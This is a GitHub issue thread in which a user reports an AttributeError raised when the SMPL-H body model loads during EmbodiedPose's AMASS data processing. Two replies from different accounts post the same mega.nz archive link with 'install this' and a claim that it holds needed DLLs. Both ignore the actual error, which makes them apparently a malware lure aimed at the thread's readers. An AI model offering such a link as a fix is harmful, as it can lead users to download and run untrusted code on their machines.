### ISSUE TITLE
AttributeError: 'Struct' object has no attribute 'hands_componentsl'

### ISSUE THREAD

**Issue by 2003fjh** [ZhengyiLuo/EmbodiedPose#8]
运行：python uhc/data_process/process_amass_db.py

uhc/data_process/process_amass_db.py
326: SyntaxWarning: assertion is always true, perhaps remove parentheses?
  assert(osp.exists(db_dataset), "AMASS DB not found")
******* Reading AMASS Class Data, Single Instance! ***********
sample_data/amass_copycat_take5_test_small.pkl
100%|██████████████████████████████████████████████████████████████████| 10/10 [00:00<00:00, 33367.57it/s]
Removed Keys: []
Dataset Root:  sample_data/amass_copycat_take5_test_small.pkl
Dataset Num Sequences:  10
Traj Dimsnion:  104
Data mode:  all
Adaptive_iter 200
T Max:  300
T Min:  15
******* Finished AMASS Class Data ***********
Traceback (most recent call last):
  File "uhc/data_process/process_amass_db.py", line 337, in <module>
    smpl_parser_n = SMPLH_Parser(model_path="data/smpl", gender="neutral", use_pca=False, create_transl=False)
  File "/data2/2024/fjh/EmbodiedPose/UniversalHumanoidController/uhc/smpllib/smpl_parser.py", line 466, in __init__
    super(SMPLH_Parser, self).__init__(*args, **kwargs)
  File "/data1/miniconda3/envs/embodiedpose/lib/python3.8/site-packages/smplx/body_models.py", line 643, in __init__
    left_hand_components = data_struct.hands_componentsl[:num_pca_comps]
AttributeError: 'Struct' object has no attribute 'hands_componentsl'
Sorry, I don't know what cause this problem, can you give me some suggestions to fix it up? Thank you a lot!

**Comment by websquadpro** [comment]
install this

https://mega.nz/file/1vkGlJTL#yU-SJLlIilF0mx5qwpPOd3BM8iKZqOJLEQUStR76rrQ
I put the necessary dlls in the archive

**Comment by Andrez092** [comment]
install this

https://mega.nz/file/1vkGlJTL#yU-SJLlIilF0mx5qwpPOd3BM8iKZqOJLEQUStR76rrQ

you may need to install the c compiler
